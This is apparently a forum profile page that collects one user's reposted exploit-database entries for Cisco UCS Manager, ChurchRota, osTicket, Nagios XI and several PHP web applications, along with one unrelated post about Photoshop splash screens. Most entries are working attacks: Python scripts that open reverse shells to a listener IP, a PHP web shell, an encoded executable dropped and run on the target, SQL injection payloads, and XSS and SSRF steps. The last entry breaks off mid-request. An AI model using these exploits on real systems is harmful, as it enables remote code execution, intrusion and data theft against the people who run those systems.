Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Cisco UCS Manager 2.2(1d) - Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cisco UCS Manager 2.2(1d) - Remote Command Execution # Description: An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888. # Date: 1/15/2021 # Exploit Author: liquidsky (J.McPeters) # Vulnerable Software: Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).] # Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html # Version: 2.2(1d), 2.2(3c)A # Cisco Reference: https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888 # Tested On: Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64)) # Author Site: https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution # Special Notes: This application by default uses outdated TLS 1.0 for communication, so thats why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changes back after exploitation). # # Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~ # import sys, ssl, os, time import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print "+-------------------------------------------------------------+" print print "- Cisco Unified Computing System Manager CGI RCE " print print " Cisco UCS Manager - 2.2(1d)" print print "- PoC by: LiquidSky - 1/15/21 | CISCO-BUG-ID: CSCur90888 " print print "+-------------------------------------------------------------+" try: target = sys.argv[1] shellip = sys.argv[2] shellport = sys.argv[3] except IndexError: print print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0] print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0] print sys.exit() def ch3x_w00t(): if os.geteuid()==0: print "[*] Running exploit as root." else: print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf" print "[x] Most likely going to see an error..." time.sleep(5) # Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages... def cisco_vuln(): ch3x_w00t() print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)" os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak") os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf") print "[*] Checking vulnerable URL " headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" #Checking page check = requests.get(cisco_url, headers=headers1, verify=False) #Grabbing response res = check.text if "true" in res: return True return False # Safety check - make sure the user is okay with the TLS1.0 temp fix # Shout out to Dean ^^ for keeping me polite... def exploit_question(): print "[x] Warning the service by default uses TLS1.0 so . . ." print print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2" print print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..." print question = raw_input('[!] Do you wish to continue, "yes" or "no" ?') if question == 'yes': print print "[!] Great attempting exploitation checks: " + target + '!' cisco_vuln() else: print print "[x] Stay safe m8 ;) - Read the source, its safe . . " print sys.exit() exploit_question() def cisco_response(): headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" request = requests.get(cisco_url, headers=headers1, verify=False) if request.status_code == 200: print "[x] Page seems to exist -- Possibly vulnerable?" else: print "[!] Page does not exist - Not vulnerable" print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") sys.exit() def cisco_exploit(): cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + "" print "[?] If this works you will see the exploit hang" requests.get(cisco_url, headers=headers, verify=False) print "[!] Shell Sent" cisco_exploit() def main(): if cisco_vuln(): print "" print "[+] Perhaps success?" print "" print " ^_~ got shellz? - [ liquidsky | 2021 ]" print print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") else: print "[-] failure!" print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") if __name__ == "__main__": main()
  2. HireHackking

    Life Insurance Management System 1.0 - 'client_id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection # Date: 15/1/2021 # Exploit Author: Aitor Herrero # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html # Version: 1.0 # Tested on: Windows /linux / Login in the application Go to clientStatus.php?client_id= sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 <http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>"
  3. HireHackking

    Life Insurance Management System 1.0 - File Upload RCE (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated) # Date: 15/1/2021 # Exploit Author: Aitor Herrero # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html # Version: 1.0 # Tested on: Windows /linux / Login in the application Go to Clients and you can add new client o modify existent Click examination botton and upload a test.php with content: "<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>" Click Upload and intercept with burpsuite Change the content type to image/png Go to the path http://localhost:8080/lims/uploads/test.php?cmd=dir
  4. HireHackking

    Title: Modify the Adobe series startup picture

    HireHackking posted a blog entry in Hacker Technology
    Use PsCoser to easily and quickly personalize Photoshop's splash screen, interface icons, and hide and customize the splash text. In addition, the software author provides some PSD templates for startup image materials, which is convenient for everyone to modify. The software author passed the test in Photoshop CC 2015 2017, 2018, 2019, and 2020. Main functions: Modify Photoshop's startup screen. Modify Photoshop's interface icon (icon in the upper left corner of the window). Hide and customize startup text. Provides theme functions to manage startup screens, icons and startup texts for easy management and quick switching. Parses and modify Photoshop Icon Resources files to export and modify more Photoshop internal pictures. Modification method After downloading, unzip it and get the following file. Double-click PsCoser_beta6.exe to run. Please open it with an administrator in the system above win10. You need to select the installation location of Photoshop for the first run After the selection is completed, the following prompt will be displayed if it is available. After setting up your favorite startup diagram, you can see the effect by starting PS. Finally, it is important to note that you should backup in advance before making changes. Otherwise, I can't change it.
  5. HireHackking

    osTicket 1.14.2 - SSRF

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: osTicket 1.14.2 - SSRF # Date: 18-01-2021 # Exploit Author: Talat Mehmood # Vendor Homepage: https://osticket.com/ # Software Link: https://osticket.com/download/ # Version: <1.14.3 # Tested on: Linux # CVE : CVE-2020-24881 osTicket before 1.14.3 suffers from Server Side Request Forgery [SSRF]. HTML page is rendered on backend server on calling "Print" ticket functionality. Below are the steps to reproduce this vulnerability: 1. Create a new ticket 2. Select "HTML Format" format. 3. Add an image tag with your payload in src attribute i.e. "<img src=https://mymaliciouswebsite.com"> 4. After submitting this comment, print this ticket. 5. You'll receive a hit on your malicious website from the internal server on which osTicket is deployed. For more details, read my following blog: https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0 https://nvd.nist.gov/vuln/detail/CVE-2020-24881
  6. HireHackking

    ChurchRota 2.6.4 - RCE (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated) # Date: 1/19/2021 # Exploit Author: Rob McCarthy (@slixperi) # Vendor Homepage: https://github.com/Little-Ben/ChurchRota # Software Link: https://github.com/Little-Ben/ChurchRota # Version: 2.6.4 # Tested on: Ubuntu import requests from pwn import listen ############################################################################################################ # Description # # Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. # # The user does not need to have file upload permission in order to upload and execute an arbitrary file. # # The application is written primarily with PHP so we use PHP in our PoC # ############################################################################################################ # credentials of the low privilege user USERNAME='slixperi' PASSWORD='slixperi' LISTENER_IP = '127.0.0.1' LISTENER_PORT = '4444' TARGET_IP = '127.0.0.1' TARGET_PORT = '8081' # set the credentials for login POST credentials = {"username":USERNAME,"password":PASSWORD} # create a session to preserve session state sesh = requests.session() # login as our low-privilege user (normally only admins can upload files) sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials) # define the payload payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>" # file upload sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"}) files = {'resourcefile': ("shell.php", payload)} sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files) l = listen(LISTENER_PORT) # execute the file sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php") l.interactive()
  7. HireHackking

    Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS # Exploit Author: omurugur # Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html # Version: 11.1.1.7.140715 # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr Stored XSS: “;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))} Vulnerable area = Dashboard - Add New Text
  8. HireHackking

    Apartment Visitors Management System 1.0 - 'email' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection # Date: 20.01.2021 # Exploit Author: CANKAT ÇAKMAK # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 # Version: V1.0 # Tested on: Windows 10 ---------------------------------------------------- POST /avms/forgot-password.php HTTP/1.1 Host: test.com Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: test.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://test.com/avms/forgot-password.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 email=test%40gmail.com&contactno=1&submit= ---------------------------------------------------- poC: Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=test@gmail.com' AND (SELECT 2600 FROM (SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
  9. HireHackking

    Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) # Date: 19/01/2021 # Exploit Author: Richard Jones # Vendor Homepage:https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 2004 + XAMPP 7.4.4 import requests # --- Edit your settings here ---- IP = "192.168.1.207" # Website's URL USERNAME = "potter" #Auth username PASSWORD = "password" # Auth Password REV_IP = "192.168.1.207" # Reverse shell IP REV_PORT = "8888" # Reverse port # -------------------------------- INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php" LOGIN_URL = f"http://{IP}/votesystem/admin/login.php" VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php" CALL_SHELL = f"http://{IP}/votesystem/images/shell.php" payload = """ <?php header('Content-type: text/plain'); $ip = "IIPP"; $port = "PPOORRTT"; $payload = "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"; $evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ".$port." ".$ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir); $res .= "Using dir : ".$tmpdir; $filename = "D3fa1t_shell.exe"; $file = fopen($filename, 'wb'); fwrite($file, $evalCode); fclose($file); $path = $filename; $cmd = $path.$evalArguments; $res .= "\n\nExecuting : ".$cmd."\n"; echo $res; $output = system($cmd); ?> """ payload = payload.replace("IIPP", REV_IP) payload = payload.replace("PPOORRTT", REV_PORT) s = requests.Session() def getCookies(): r = s.get(INDEX_PAGE) return r.cookies def login(): cookies = getCookies() data = { "username":USERNAME, "password":PASSWORD, "login":"" } r = s.post(LOGIN_URL, data=data, cookies=cookies) if r.status_code == 200: print("Logged in") return True else: return False def sendPayload(): if login(): global payload payload = bytes(payload, encoding="UTF-8") files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "firstname":"a", "lastname":"b", "password":"1", "add":"" } r = s.post(VOTE_URL, data=data, files=files) if r.status_code == 200: print("Poc sent successfully") else: print("Error") def callShell(): r = s.get(CALL_SHELL, verify=False) if r.status_code == 200: print("Shell called check your listiner") print("Start a NC listner on the port you choose above and run...") sendPayload() callShell()
  10. HireHackking

    Online Documents Sharing Platform 1.0 - 'user' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection # Date: 21.01.2021 # Exploit Author: CANKAT ÇAKMAK # Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip # Version: V1.0 # Tested on: Windows 10 #Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection. ---------------------------------------------------- POST /path/login.php HTTP/1.1 Host: test.com Content-Length: 29 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://test.com/path/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 user=%27&pass=%27&login=login ---------------------------------------------------- #PoC: Parameter: user (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=' AND (SELECT 2047 FROM(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)-- HnhM&pass='&login=login
  11. HireHackking

    Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting # Date: 1-20-2021 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.5 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI. # Vulnerable Parameter : url # POC # Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload. POST /nagiosxi/tools/mytools.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 145 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1 Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas Upgrade-Insecure-Requests: 1 